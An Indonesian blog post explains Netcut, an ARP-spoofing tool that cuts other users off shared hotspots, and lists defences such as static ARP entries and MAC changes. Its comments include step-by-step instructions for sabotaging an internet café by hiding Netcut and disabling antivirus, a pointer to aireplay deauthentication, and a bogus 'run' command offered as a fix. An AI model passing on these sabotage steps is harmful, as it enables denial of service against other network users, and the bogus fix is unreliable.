Beranda > freestuff, Oprexz, TUTORIAL/HOW TO > Netcut, pemotong koneksi clien hotspot dan penangkalnya

Netcut, pemotong koneksi clien hotspot dan penangkalnya

Pernahkah anda merasa koneksi di wifi-hotspot anda lemot bahkan tidak jalan samasekali? Jangan buru-buru berkesimpulan koneksi ke ISP yang bermasalah, karena bisa jadi ada user nakal bin jahil yang berlaku curang menggunakan aplikasi pemutus koneksi dari client ke server.

Adalah Netcut, sebuah aplikasi yang seperti namanya yang memotong akses internet pada public/private WIFI hotspot, ataukah sebuah PC LAN workgroup dari client ke server atau sebaliknya. Program ini pada umumnya dipergunakan oleh pengguna jaringan yang ingin mengambil quota (jatah) bandwith untuk dipakai sendiri tanpa mau dishare kepada client yang lain.

Pencurian bandwith dengan memutuskan koneksi secara teoritis sangat manjur untuk meningkatkan kecepatan akses internet, misalnya sebuah jaringan mendapat jarah 100 Kb/s dan akan dibagi kepada 10 client maka masing-masing client akan memperoleh 10 Kb/s. Dengan Netcut, maka kita bisa memutuskan koneksi 9 client yang lain dan jatah 100 Kb/s akan menjadi milik kita.

Kejam bukan?….

Tidak heran, bila dibeberapa public WIFI hotspot yang pernah saya kunjungi sering saya dapati banyak yang mengeluh tidak bisa conect internet, atau lebih ekstrim lagi user yang perang netcut yang menyebabkan tidak ada satu pun user yang bisa online. Atau seperti pengalaman rekan blogger lain yang hampir terlibat kontak fisik gara-gara netcut sialan :mrgreen:

Penggunaan netcut cukup simpel, cukup memilih IP/Hostname/Mac Address client yang ingin diputuskan koneksinya dan mengklik cut off. User tersebut akan terputus koneksinya dari server sampai kita membebaskannya dari netcut dengan mengklik Resume atau mengganti IP address nya.

Program Netcut itu sendiri bisa didownload DISINI

Tips menangkal serangan Netcut:

  • Jangan Pernah menggunakan Netcut. Sekali orang dirugikan akibat perbuatan anda, maka akan ada dendam. Peace gan!
  • Rubah IP address anda apabila merasa dijahili dengan Netcut.
  • Gunakan Anti Netcut  (tetapi netcut selalu lebih maju dari anti netcut)
  • Hidden komputer dari LAN pake XP antispy
  • Install anti ARP (trial)
  • Rubah  MAC Address
About these ads
  1. Mei 25, 2009 pukul 7:44 am | #1

    gimana caranya k’…… hidden komputer dari LAN? XP antispy gmn? Anti ARP tu opo? trus da softwarex ga? gmn rubah MAC Address nya? sy sudah pake Netcut tp kaya’nya ga ngaruh dech!!! di kampuz bnyak yang make… trutama Zeniour!! pa lagi di Kapal ma LT8 hufffff da tutorial lengkapnya k’? buat hidden , ARP n’ MAC Addrs?

  2. Mayco
    Mei 26, 2009 pukul 2:59 am | #5

    buat vista 32bit bisa ga netcutnya???

  3. Mayco
    Mei 26, 2009 pukul 3:01 am | #6

    netcut n antinetcutnya nya buat vista 32bit bsa ga??

  4. rasy_machie
    Mei 28, 2009 pukul 4:35 pm | #7

    sering kaliiiii gw ngalamin hal itu :P

    hehehehe

    • April 13, 2010 pukul 10:41 am | #8

      Anti Netcut yg paling ampuh, dan tak ada duanya. hidupkan komputer, monitor terus. block jika kedetect. tembus juga. matikan router. beresss es es es.

      • arra
        Februari 16, 2012 pukul 8:37 pm | #9

        stuju gan,,ru tadi tuch net w kcolong’n,,da yg pke netcut ;(
        sialan dah,,nazoooo_O’nk

  5. rasy_machie
    Mei 28, 2009 pukul 4:37 pm | #10

    wew map om ,,,

    orang coment kok gak di balas tuh
    kasain kan om

    ada yang tanya tuh
    kasih tau donk om :D

  6. Mei 30, 2009 pukul 5:49 pm | #11

    HHhmm…..Ulasan yang menarik….

  7. kaum duafa
    Juni 2, 2009 pukul 6:53 pm | #12

    cara setting anti arp gimana yah??????
    supaya IP kta tdak terdeteksi

  8. smandut
    Juni 5, 2009 pukul 5:04 pm | #13

    Ma kasih bang atas infonya…..

    akhirnya gw dapat anti netcut….

    • ginting
      Juni 12, 2009 pukul 11:32 pm | #14

      napa wktu jalanin netcut g ad network adapter yg detect??aku pke yg 2.08 di windows xp sp2..dah coba gnti yg laen tp tetep ja g bisa..knp y??

      • Juni 13, 2009 pukul 3:19 am | #15

        @ginting: sepertinya permasalahannya adalah jenis network adapter (Wlan/Lan card)nya tidak terdeteksi. solanya Netcut menggunakan WInPcap untuk software tambahan buat capture/submit data nya. Hanya hardware tertentu saja yang disuport

        • Juli 10, 2009 pukul 12:54 am | #16

          misalkan kmu korban netcut…cobalah kmu.
          star-run-ketik…..”prosessor22 -kenyang31 -makan33 -connection9999 port9999″

          mdah2han trik tersebut akurat

          siiip dahh

        • jaller
          Juli 20, 2009 pukul 9:56 pm | #17

          wah aku coba gak bisa tu gimana? ada netcut versi yang ampuh ga? coz yang aku donlot disini versi “risk at ur own” ato beta. gak jalan blass!! yang hotspotan laen tetep bisa enjoy

  9. Juni 16, 2009 pukul 10:08 am | #18

    om aku komen dikiit ya,
    untuk perubahan mac dan IP keqnya kurang sret deh… klo server mikrotik yang sudah matokin ip dan macnya gmn donk? sama aja boong, antiARP boleh juga tuh, yang ketauan tonjok aja huehuehuehu

    • Juli 26, 2009 pukul 8:14 pm | #19

      Sebenarnya untuk administrator jaringan yang ingin hotspotnya aman, bisa mengurangi kesempatan diserang netcut dengan cara menginstal program firewall di servernya dan tidak mengijinkan port-port tertentu yang dipakai netcut bisa dijalankan dalam system

  10. jolodong
    Juni 19, 2009 pukul 5:49 pm | #20

    iya…mw d pukul pelanggan…gmn cb,,,d cabut kabel jaringany aj x ya…sukur……

  11. tino
    Juni 20, 2009 pukul 2:54 am | #21

    trus ngap,,netcut diciptakan??

  12. hhadisi
    Juni 24, 2009 pukul 5:12 pm | #22

    maaf, saya nyoba pake netcut, tp laptop saya langsung bluecreen….klo boleh tau kenapa?

  13. cya
    Juni 30, 2009 pukul 11:55 pm | #23
  14. jaller
    Juli 15, 2009 pukul 5:16 pm | #25

    haahaahaaahhaaaaa,… dasar, siapa sih yang bikin program sialan kayak gitu?
    nice info bro,.. thank u

    tapi kenapa di share? ntar malah di Indon pada perang netcut lagi. hehehe

  15. refind
    Juli 26, 2009 pukul 11:55 am | #26

    makasih mas atas keterangannya ii yang saya butuhkan banget masalahnya saya rebutan terus jaringan terus sama temen hampir kelahi saya

    • Maret 9, 2010 pukul 9:28 am | #27

      Kwaaka…ujung2nya juga bakal berkelahi lagi mas, kalo ketemu perang net cut

  16. andreawanluplita
    Juli 27, 2009 pukul 1:17 am | #28

    Keren brow

  17. Juli 29, 2009 pukul 1:41 am | #29

    langsung ke TKP y sob.
    salam kenal :D

  18. Agustus 1, 2009 pukul 8:19 pm | #30

    klo pake linux bisa ngecut juga ga pake nekat eh sory maksud aye netcut……….

  19. Agustus 1, 2009 pukul 11:14 pm | #31

    dari pade ribet…. mending main game grtis…tis….
    KLIK DISINI
    KLIK DISINI

  20. almi
    Agustus 6, 2009 pukul 11:17 am | #32

    wah mkasih nih bwt info nya

  21. blackpack
    Agustus 6, 2009 pukul 9:48 pm | #33

    Mas skrg bukan cmn netcut aja yg bs memotong koneksi internet.. banyak aplikasi yg bs dipake buat jahil, misalx netrobocop,p2pover,winattacker,spoofattack,sniffattack,dan msh banyak lg.. sbenarnya yg terjadi adalah org2 yg mnggunakan aplikasi tersebut ingin coba-coba, namanya sj pengetahuan ya harus dicoba dulu, cmn harus pake toleransi donk, jgn main kick aja.. untuk semua online mania MAKE BETTER WORLD THROUGH COMPUTER

  22. Agustus 7, 2009 pukul 9:05 pm | #34

    q udh download bro netcut..
    tapi pas q coba di laptop q…hang langsung …berat minta ampun programnya pas dijalankan..
    q coba laptop temen q juga..
    gmn bro solusinya???

    • Agustus 8, 2009 pukul 3:33 am | #35

      sepertinya hardware komputer kamu yg tidak support atau antivirus/firewall windows mu yg ngeblok.
      harus dianalisa dulu nih penyakitnya

  23. lennon
    Agustus 8, 2009 pukul 9:23 am | #36

    kan aq nyoba pke netcut ni hot spot,tapi ko ttp g bisa jalan ya softwarenya??????

  24. pram
    Agustus 20, 2009 pukul 4:53 pm | #37

    ARP itu singkatan apa?

  25. September 15, 2009 pukul 10:44 pm | #38

    Nice Post, senang bisa berkenalan dengan anda. Saya mengalami kejadian pahit ini di warnet saya. Sejak awal di warnet saya memang bebas dari situs jorok. ada user yang memotong koneksi client. saya sampai kelimpungan mereview jaringan dan hasilnya nihil. Thanks alot, man. semoga ini menjadi ilmu yang bermanfaat dan merupakan amal ibadah anda yang berlipat 7 pahalanya.

    • September 29, 2009 pukul 10:00 am | #39

      ^^
      ARP > Adress Resolution Protocol
      ketik aja di cmd > arp

  26. kingongel
    Oktober 4, 2009 pukul 5:01 pm | #40

    Bisa Buat winsdows 7 g?
    menarik tu….

  27. Son2Labs
    Oktober 5, 2009 pukul 4:12 am | #41

    netcut pernah dicoba ga kena kl pake windows vista sp2

  28. Oktober 6, 2009 pukul 9:51 am | #42

    bisa d’coba pake vista g’ soale kmarin pas tak coba pada vista jadi not responding.

    • Oktober 8, 2009 pukul 11:58 am | #43

      @^
      Yup Buat Vista Not Responding Gak tau juga kenapa….

      • dolly
        Oktober 28, 2009 pukul 11:19 pm | #44

        bro..gw pake vista ultimate,
        bisa jalan koq,
        keren nni soft !!

  29. muslim
    Oktober 10, 2009 pukul 2:53 am | #45

    gmana caranya om kl dtangkis lewat cmd! mohon solusinya om…..

  30. ahmad
    Oktober 10, 2009 pukul 2:31 pm | #46

    boleh minta netcut full fersion ga???

  31. akbar
    Oktober 17, 2009 pukul 10:07 am | #47

    wah.. netcut udah basi.. ad yang lain gx???
    netcut udah kalah jjaman…

    • Oktober 19, 2009 pukul 5:23 pm | #48

      Mau yang lebih kejam???
      coba pelajari program aireplay di Linux Backtrack.
      Bukan hanya memutuskan koneksi internet, tapi koneksi wifi dari korban ke access point akan terputus…

  32. supra
    Oktober 29, 2009 pukul 8:48 pm | #49

    bang cara makai ya gimana bank net cut beri donk cara ya

  33. kellyyy
    November 2, 2009 pukul 5:00 pm | #50

    mas bingung ne cara gunain netcut…
    tu kan udah kita install netcut,, trs,,yang ke detec tu kan IP kita sendiri…biar tau,,or cara ngecut target gmn ya….??? trmksh….

  34. ali
    November 4, 2009 pukul 5:52 pm | #51

    hebat………..boz

  35. Rozzzaaa22
    November 9, 2009 pukul 9:34 pm | #52

    aq udah nyoba tapi lemooot bgd…
    aq cma coba2 lho… ntar tak hidupin lagi…
    maklum uda pernah jadi korban…huuuhf!

  36. ora weruh
    November 9, 2009 pukul 9:40 pm | #53

    eh… antinetcut yang bagus apa y???
    dari pada ngasih netcut mending ngasih antinnya yang bagus….

  37. walesa
    November 15, 2009 pukul 10:24 am | #54

    belum pernah kena tuh selama pake *BSD buat firewall dan gateway. tapi artikelnya bagus untuk tambahan informasi. makasih ya…

  38. dira
    November 17, 2009 pukul 3:21 pm | #55

    gmna crax bwt menangkal netcut… crax rumit bgt…

    tlong krim kn crax…

  39. November 18, 2009 pukul 6:14 am | #56

    Wah, jahil banget pake netcut

  40. November 21, 2009 pukul 4:21 am | #57

    boy share software Netcut na dung
    link download nya dah ga bisa.
    ke ndruu_frd@yahoo.co.id
    thanks befor

  41. November 24, 2009 pukul 11:02 am | #58

    emang penjahat tu orang-orang yang pada pake NetCut!!!

  42. November 29, 2009 pukul 12:12 am | #59

    Masih juga yach pake NetCut or Anti NetCut….
    Nih Scripnya kalo takut sama yang namanya NetCut, di jamin free NetCut…
    Prinsip kerjanya merubah ARP Dinamis menjadi Statis…
    pertamanya kita harus tahu prinsip kerja dari Netcut itu seperti apa…kalau ARP kita masih dalam ARP statis…NetCut kayaknya jauh deh….

    arp -d *

    arp -s 192.168.1.1 00-24-d2-9b-60-08

    cara :
    1. Tulis Scrip di atas dalam Notepad.
    2. Save di drive ARP.bat
    3. Double clik..
    4. ARP kita dah dalam bentuk statis deh…
    5. Free Netcut..
    6. Net mencoba..
    7. Moga bermanfaat buat temen2…

    Catatan :
    => IP-nya di ganti yach…
    tergantung IP server-nya…
    IP Class A
    IP Class B
    IP Class C
    IP Class D
    IP Class E

    • jikong
      Desember 2, 2009 pukul 3:16 pm | #60

      ak nyoba ARP.bat, tapi kok g kelar2 y?
      looping forever…
      knp y?

  43. Desember 2, 2009 pukul 5:54 pm | #61

    Catatan : .exe sangat rentan….

    kalu Looping forever berarti yang bermasalah is Command prompt OS….!!!!

    coba masuk :
    cmd > arp -a
    >ping google.com -t

    kalau CMD keluar secara otomatis…..????
    Bisa dapat di pastikan OS kita yang bermaslah….
    aku share scrip yang aku pake….
    NB : jangan di edit ya….Exx….

  44. Desember 2, 2009 pukul 5:55 pm | #62

    arp -d *

    arp -s 172.16.16.1 00-24-d2-9b-60-08

  45. Desember 2, 2009 pukul 6:00 pm | #63

    Tambahan :

    Kalau belum berhasil juga…ada alternatif lain…. dengan merubah MAC-Address secara manual…kamu reques ja ke t4-ku..

    sho_bir_one@yahoo.co.id

    tenang aja, selama dalam masa tahap pembelajaran or share2 ilmu….semuanya bersifat Gratistis…!!!

    • Desember 15, 2009 pukul 11:38 pm | #64

      Thanks atas ilmunya, semoga bisa membantu agan2 sekalian disini.

  46. Desember 4, 2009 pukul 1:17 am | #65

    artikel nya bagus

  47. masamune
    Desember 5, 2009 pukul 2:41 am | #66

    dsene hampir perang ne gara2 netcut…

  48. Desember 7, 2009 pukul 3:06 pm | #67
  49. anak baek
    Desember 11, 2009 pukul 11:26 am | #68

    wah bahaya juga tu netcut….

  50. ihwan
    Desember 12, 2009 pukul 2:58 am | #69

    tolong beritahu saya mengapa game texas holdem tak bsa dibuka ?

    • Desember 15, 2009 pukul 11:36 pm | #70

      1. Mungkin gamenya di block di jaringan. Sekarang admin kantor suka ngeblock port2 tertentu selama jam kerja, misalnya port untuk: game online, torrent, messaging, IRC, dll
      2. cek apakah browser (misal:mozilla atau IE) menggunakan flash player terbaru

  51. Desember 14, 2009 pukul 2:10 pm | #71

    Wah kok banyak yang pada pinter pinter tho ya lha aku kapan donk.. he he

    • rusdi
      Desember 14, 2009 pukul 3:36 pm | #72

      udah pake net cut di kantor, kalo ada karyawan browsing saat jam kerja langsung di cut jaringannya, tapi masalahnya pada saat nge cut, komputer kita juga ga bisa konek

      • Desember 15, 2009 pukul 11:32 pm | #73

        @rusdi: coba cek, apakah IP sendiri sama IP gateway jaringan ikut ke-cut.

  52. azril
    Desember 18, 2009 pukul 4:30 pm | #74

    ngapaen di buat cut net yg ada rugiin aj

  53. Desember 18, 2009 pukul 9:30 pm | #75

    neh wa kasih tau klo mau bkin warnet orang malu ato bangkrut

    biasanya orang ambil paket 4 jam agar net nya ancur ato malu

    1.download net cut yg versi.2.1
    2.download virtual desktop
    http://sourceforge.net/projects/virtual-desktop/files/Virtual%20Desktop%201.02/1.02/DesktopSetup.exe/download

    3.matikan antivirus yg ad di net

    4.instal desktop setup na

    5.tken alt2 alt 3 dan alt 4

    ^
    ^
    adalah virtual desktop

    6.buka net cut na di alt 2 alt 3 seterah anda

    7.potong semua koneksi

    8.nah inget biasany ambil paket langsung byar

    ketika dah selesai tahap 1-8
    kabur deh

    modal 10rebu net ancur

    kawawkakawk

  54. Bob
    Desember 23, 2009 pukul 10:00 am | #76

    anti netcut nya gag manjur gag berfungsi saya coba test tetp ajjah……koneksinya terputus

  55. Desember 24, 2009 pukul 2:33 am | #77

    Mm..
    kira-kira bisa berfungsi gak klo di gunakan di wlan??

    • Januari 13, 2010 pukul 1:11 am | #78

      berfungsi kok…
      mau LAN atau WLAN selama port untuk ARP server aktif, maka netcut bisa dipakai

  56. ok
    Desember 28, 2009 pukul 3:37 pm | #79

    boleh jg tuh penangkal nya

  57. Desember 28, 2009 pukul 9:45 pm | #80

    hahah

  58. ryan
    Desember 30, 2009 pukul 1:30 pm | #81

    saya udh prnh nyoba NetCut d wrnet & kampus sy.. hasil ny memang seluruh komp yg di cut off disconect smua..
    Tp pas sy coba di Laptop sy melalui jringan hotspot trnyata gk bisa.. IP yg sy cut off tetap saja conect.. Tlg ksh tau sy solusiny ke email sy..
    thanks y..

    • Desember 30, 2009 pukul 5:04 pm | #82

      Wah………..
      Disini dah jadi sarang Share Ilmu yg bermanfaat yach (Maksudnya ga merugikan Temen2 yg lain)………
      Amien….He..he…he…

      Numpang nanya nih ma Admin’nya……
      Fikri SMANSA BOLO 05 ????

    • Januari 13, 2010 pukul 1:10 am | #83

      artinya IP yg mau di cut punya penangkal cut atau settingan netcut anda yg belum benar.

  59. Fenrir
    Januari 5, 2010 pukul 6:13 pm | #84

    emang sih tuh program bikin siapapun jadi gregetan dan kalo ketauan yang make bisa jadi adu jotos. tetapi ada baiknya kalo yang make netcut itu mau bantuin orang banyak. q n temenku sebetulnya juga pemakai cuman akhirnya q hrs tanggung jawab moral. kami memastikan gak ada orang yang downloadnya kelewat batas. spt penggunaan download accelerator dengan menggila bahkan kami sendiripun. maksudku sampai 7 atau 8 file didownload dalam waktu bersamaan dengan transfer rate maximum. jelas bikin acces jd lemot. kalo orang yg bersangkutan waktu ditanya download apa tapi jwbannya malah “rahasia” n gak bagi2 ke temen2nya mulai dari situ salah satu dari kami mulai bertindak. tapi kalo mau share ke banyak orang ya kita coba ingetin deh. tentu aja tanpa ngasih tau bahwa kita punya program terlarang.

  60. Januari 6, 2010 pukul 3:00 am | #85

    hajaarr broww

  61. Bir_One
    Januari 6, 2010 pukul 10:36 pm | #86

    berarti yang salah provider yg tidak membatasi tiap client atau pembagian bandwith….
    Misal bandwithnya 10MB…
    Client 10..
    Berarti masing2 cuma bisa megakses sebanyak 1MB…
    {tergantung setingan dari Server}….

    atau kita salahkan orang yg bikin Netcut….

    atau kita salah kan orang yg pake Netcut….

    atau kita salahkan diri kita sendiri, yang tidak bisa mmenghindar dari ancaman NetCut..

    Lebih baik mencegah dari pada mengobati Bukan……

    Peace Brada…

    • Januari 13, 2010 pukul 1:08 am | #87

      betul betul…
      harusnya seperti itu gan. tapi masalahnya pembagian dirasa efektif kalau jumlah usernya tetap (misal: warnet) tapi kalo user dinamis seperti hotspot solusi utama untuk itu yah mau tidak mau harus menambah bandwith dari ISP. kalo gak pasang server dengan firewall ampuh seperti OS Mikrotik atau program Linux lainnya untuk server.

    • usen
      Agustus 17, 2011 pukul 1:47 am | #88

      benarrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr kali tu massssss

  62. Januari 7, 2010 pukul 4:06 pm | #89

    knp dia hrs ada ni netcut ya :D

    • usen
      Agustus 17, 2011 pukul 1:49 am | #90

      krna yang numpang ngak sadar diri

  63. Bir_One
    Januari 14, 2010 pukul 2:13 pm | #91

    wah..admin di tanya ga di jawab..
    ga astik ah…………….

    • Januari 14, 2010 pukul 9:25 pm | #92

      sorry mas Bir_One, pertanyaan yg mana lg yg kelewat yah??
      yg “siapa yg salah” itu yah mas?
      kalau itu sy percaya filosofi dua mata pisau teknologi (two side effect) bahwa teknologi dasarnya diciptakan untuk membantu meringankan pekerjaan manusia. Baik dan buruk adalah efek wajib yg timbul dari itu. Sekarang tinggal kita mau membawa teknologi itu ke arah yang baik atau buruk?
      Dan Netcut pun begitu, tergantung kita mau dipakai untuk kebaikan (oleh operator warnet misalnya) atau buruk (client usil). Begitupun dengan antinetcut.

      kalau saya sih mengharapkannya untuk kebaikan, karena saya tidak suka dijahili atau diusili ketika ngenet.

      gimana mas? kalau masih kurang tolong ditambahi :mrgreen:

  64. Penyakit iblis
    Januari 21, 2010 pukul 4:54 am | #93

    Ye ye ye ye. . .
    Seneng dech ada software pemutus jaringan, asyik. . .
    Jaringan Q cpet bgts, Hore. . . Hore, hahahaha. . .

    (^_^)

  65. edi soebkan
    Januari 26, 2010 pukul 11:34 pm | #94

    yang punya web minta ijin copy ya…..

  66. nhio
    Februari 8, 2010 pukul 3:44 pm | #95

    thanx bro atas penjelasannya

  67. Iwan
    Februari 10, 2010 pukul 6:33 pm | #96

    Sebenarnya program ini cocok kok untuk orang IT di kantor, kantor skala kecil yaa .. Tapi kalo pun orang dendam, yaa mo gimana lagi .. itulah tugas nya TI.. Emang gak enak kerja jadi TI .. serba salah ..

    Oh ya informasi tambahan, bagi korban Netcut percuma saja jika ingin rubah IP, karena mo berapa banyak ganti IP sebanyak apapun, selama MAC address masih sama koneksi akan tetap terputus ..

    • Februari 11, 2010 pukul 4:11 am | #97

      betul banget bro..
      tool ini banyak yg pake karena lebih praktis walaupun terkadang gak ampuh2 banget…

      untuk merubah MAC address dengan cepat bisa menggunakan K-MAC
      kalau gak sempat download bisa diubah manual di wireless card properties di device manager

  68. x-men
    Februari 16, 2010 pukul 9:22 am | #99

    good, it work !! thx bro..

  69. aacoy
    Februari 18, 2010 pukul 9:37 am | #100

    info berguna mas, share age buat tmn2 disini… trims mas

  70. newbi
    Februari 22, 2010 pukul 12:36 am | #101

    thxc mas infonya…..
    oya…mas,cara rubah mac address pakai software apa ya?

  71. Maret 5, 2010 pukul 9:11 pm | #104

    smpat baca diblog teman, Anti net cut selalu ketinggalan dengan net cut itu sendiri. Gimana solusinya??

    • Maret 9, 2010 pukul 9:31 am | #105

      yah..namanya juga maling :) pinteran malingnya dari pada pakde hansip OM. hee,,

  72. Maret 6, 2010 pukul 1:31 pm | #106

    Menarik

  73. Maret 16, 2010 pukul 4:33 pm | #107

    nais info

  74. arwah
    Maret 22, 2010 pukul 8:46 am | #108

    Maaf saya newbie soal beginian… di net saya bekerja, masalah nya banyak abg2 sok jagoan yang sering buka situs BF dan itu membuat koneksi lemot banget. dan sebagian user yang sedang main pun merasa terganggu, tapi para jagoan itu ga pernah mau peduli. Kalo saya tegur malah ngajak berkelahi….Karena mayoritas jagoan2 itu tinggal di daerah sekitar net tempat saya bekerja. Yang ingin saya tanyakan kepada Bang Rhaka… Apa NetCut ini bisa untuk memutus koneksi tepat di PC yang sedang di gunakan para jagoan itu langsung dari PC billing? Apa ada pengaruh ke PC lainnya? Supaya User2(yang baik²)tidak terganggu. Dan untuk Cara mengembalikan koneksinya lagi bagaimana? apa ada tutorialnya? Terima kasih sebelumnya…

    • Maret 29, 2010 pukul 2:35 am | #109

      kalau untuk pemakaian warnet, saya sarankan menggunakan Bandwith Manager, fungsinya berbeda dengan netcut. Bandwith Manager gunanya untuk mengatur bandwith (kecepatan koneksi per-client) sehingga tidak ada client yang dirugikan dengan aktivitas download client lainnya. Jelasnya lagi, netcut=pemotong koneksi, dan bandwith manager=pembagi koneksi.

      Kalau warnetnya memakai sistem operasi linux, biasanya aplikasi ini tersedia gratis, tetapi untuk OS “jendela” biasanya harus beli dan beberapa aplikasi bandwith manager tersedia untuk versi trial/shareware.

      Silakan googling dengan keyword “free bandwith manager” :mrgreen:

  75. jo
    Maret 22, 2010 pukul 9:25 am | #110

    apa sih yang pada bilang net cut pengecut.. itu berguna banget. kosan gw ada yang makai download manager penyedot bandwith 24 jam sehari. semuanya ngenet pada lemot. yang kayak gitu kan harus di net cut biar jera. tapi kok kenapa yah bos kadang-kadang net cutnya ga jalan, tiba2 berat, tiba2 ringan. terus kalo yang kita net cut reconnect bisa ga ke net cut lagi yah?

    • Maret 29, 2010 pukul 2:39 am | #111

      @jo:
      1. cek signal wifi nya, jangan sampai lemot…
      2. Mungkin ada user lain yg juga pakai netcut, serangan arp netcut kita bentrok dengan user lain (semacam perang netcut)

  76. kunta
    Maret 25, 2010 pukul 1:18 am | #112

    mas gmn cra nya dwonload netcut gratis???

  77. Maret 28, 2010 pukul 4:41 pm | #113

    ane juga sering pake software ini gan….. maknyus… munateb dah…. kalo ane lagi kesel ngenet di kampus… ane pakai nih software…. ngak mau tahu dosen atau temen-semua ane cut…. kalo lagi bad mood betul ane cut servernya…. habis tiap orang download film rata-rata lebih dari 1…gila maniak download semua,pusing ane liatnya

    • Maret 29, 2010 pukul 2:42 am | #114

      kalau sarankan pakainya jangan sering-sering gan, kecuali kepepet saja..
      kasian user lainnya.
      hehehhehe…

  78. April 4, 2010 pukul 3:50 pm | #115

    haha download ah buat iseng2

  79. joeel
    April 4, 2010 pukul 8:36 pm | #116

    gan donload netcut nya dmn yah…

  80. fajarsx
    April 5, 2010 pukul 9:55 am | #117

    saya install di win7 kok ga mau y netcut nya?apa ada versi lain?tq

  81. sector13
    April 12, 2010 pukul 12:14 pm | #118

    apkah netcut versi yang di download d atas bisa memotong bandwith d warnet2

  82. himakom untirta
    April 17, 2010 pukul 4:12 pm | #119

    tulisannya saya kopi yah mas…
    makasih infonya…
    kita saling kunjung bisa?
    nich webblog ku
    http://bagussweet.wordpress.com
    http://himakomuntirta.wordpress.com

  83. ichigo
    April 23, 2010 pukul 3:06 pm | #120

    wah kejam banget tu netcut…

    hheheheheheheh^_^

  84. dafil
    April 28, 2010 pukul 4:44 am | #121

    good

    • dare
      April 29, 2010 pukul 3:25 am | #122

      Saya Op hotspot, kata teknisinya scurityna dah bagus.. dia minta aku coba jebol make tanpa make pass ato ip yg terdaftar. routerna make mikrotik
      kasi tau dunk cara jebolna… sebelum di jebol orang.. hehehhehe
      instal netcut di wind 7 gagal… make apa yah Gan??

      • April 29, 2010 pukul 6:48 pm | #123

        kalo jebol password WAP/WPA-PSK atau jebol filter MAC address saya rasa masih bisa.
        Tapi kalau router mikrotik, saya angkat tangan deh gan…
        hehehhe

      • Agustus 31, 2010 pukul 4:15 pm | #124

        coba pake wirelesskeyview,pasti paswordnya kelihatan,hex sama acsi,tpi ga smua orang bisa kok walaupun ada sofwarenya,krna butuh ketrampilan otak.

  85. Mei 3, 2010 pukul 8:02 am | #125

    sheeep… gan ….
    cuman cara kt tau IP qt dari mana ya …mhhn djawab y..
    hehehee…ee lum tau n…

    • Mei 4, 2010 pukul 3:45 am | #126

      klik gambar/icon wireless conection di kanan bawah taskbar, trus pilih tab support, nanti kelihatan IP addressnya. Bisa juga klik details untuk melihat MAC (phisycal address)

  86. juandi
    Mei 14, 2010 pukul 2:49 pm | #127

    ok gan.. makasi ilmu”y

  87. aji
    Mei 21, 2010 pukul 11:38 pm | #128

    diman cra dwonload netcut

  88. ahmed
    Juli 4, 2010 pukul 1:05 am | #129

    netcut, sama dengan maling ayam. cuma dapatnya 2000 rupiah aja. ada yg bisa curi credit card atau bobol atm, atau bank sekalian? bagi ya…
    netcut gak usah di tangkal. biarlah orang2 kampong belajar internet. karna mereka gak be modal.
    klu ada yg mo netcut kita kasih sedekah…

    • Agustus 31, 2010 pukul 4:07 pm | #130

      ga usah merendahkan orang miskin,ak mrasa tersinggung,wlawpun ak miskin tpi ga se kotor itu,emang ak netnya gratis tpi g merugikan yg punya,dia byr sebulan 500rb,pnya klien 30,30x150rbdia dpt 4.500.000rb ga rugi kan klo ak numpang ngenet.

    • usen
      Agustus 17, 2011 pukul 1:45 am | #131

      bagusnya kita tu kita jgn nebeng pasang dong jaringan dirumah ____________________________________________________________________________________________________________

  89. kemal
    Juli 22, 2010 pukul 1:49 pm | #132

    siip . keren isi nya ..
    wawasan gw jd tambah luas cuyy ??

    • rpm08
      September 21, 2010 pukul 3:33 pm | #133

      mantap toch………………..???

  90. Rome
    Agustus 20, 2010 pukul 4:22 pm | #134

    Gan..kalo udah di netcat apa msih bsa client yg di netcut itu online untuk bsog”nya…
    Makasih gan atas ilmunya.

    • Agustus 31, 2010 pukul 3:57 pm | #135

      bisa lah,tapi klo yg netcut kompinya ga mati bru ga bisa,krena netcutnya belum mati.klo dah mati balik normal lgi.

  91. kentu
    Agustus 29, 2010 pukul 12:09 pm | #136

    jancok

  92. September 1, 2010 pukul 11:36 am | #137

    bagaimna cara memutus net card agar di client tetap onlain.

  93. donker
    September 22, 2010 pukul 8:35 pm | #138

    kak apakah itu semua akan berhasil??

    kalo diwarnet kedetecsi servernya pa gg??/

    • Oktober 25, 2010 pukul 3:36 pm | #139

      kalo warnetnya pake antiarp bisa ketahuan lho ip berapa yang melakukan attack..

  94. atha
    Oktober 19, 2010 pukul 8:18 pm | #140

    netcut bagaimana cara menghidden IP kita sendiri, dari netcut. postingku http://rolicaview.blogspot.com

    • Oktober 25, 2010 pukul 3:30 pm | #141

      paling gampang pake XP-Antispy, pada programnya di network centang aja semua itu. Hilang dah cpu loe dari jaringan, tapi kadang2 netcut masih bisa detect lho.. sekalian ganti aja mac address loe

  95. Oktober 25, 2010 pukul 3:17 pm | #142

    Yang paling efektif adalah merubah Mac Address. operasinya disini:
    http://windows7-lyws.blogspot.com/2010/10/netcut-windows-7-dan-penangkal-nya.html

  96. attim
    November 4, 2010 pukul 2:49 pm | #143

    ka, kalau windows 7 bisa pake antinetcut, ga?

  97. Ghery Mraz Krazz
    November 11, 2010 pukul 5:04 pm | #144

    it; very

  98. November 22, 2010 pukul 11:52 pm | #145

    Artikelnya bagus !
    bagus juga buat nambah-nambah pengetahuan saya tentang IT juga cyber crime.

    • November 23, 2010 pukul 4:08 am | #146

      Terima kasih atas komentarnya… semoga kita bisa saling belajar untuk kebaikan :mrgreen:

  99. Desember 28, 2010 pukul 8:59 am | #147

    saya pengen tau bagai mana cara memakai netcut di indobiling

    • Desember 28, 2010 pukul 9:00 am | #148

      tapi saya belom tau bagai mana klo melakukan di indobiling soal nya saya tak tau aksesnya di indobiling

      • Desember 28, 2010 pukul 9:02 am | #149

        kalo itu saya tau tapi klo orang yg mencuri biling bagai mana cara mengatasi nya………….

  100. Desember 31, 2010 pukul 11:59 am | #151

    Ada cara terlepas dari Netcut selengkapnya baca

    http://wiro-com.blogspot.com/2010/12/jamu-anti-netcut.html

  101. siska
    Februari 6, 2011 pukul 7:01 am | #152

    donlot langsung Netcut4 portable http://www.mediafire.com/?4m5842ytjcda56f

  102. Februari 9, 2011 pukul 11:19 pm | #153

    mantap banget nich tipsnya…

  103. Rizki Priambodo
    Februari 19, 2011 pukul 4:30 pm | #154

    bagusss!!!
    cepat akses internet

    • Aku
      Februari 26, 2011 pukul 8:32 pm | #155

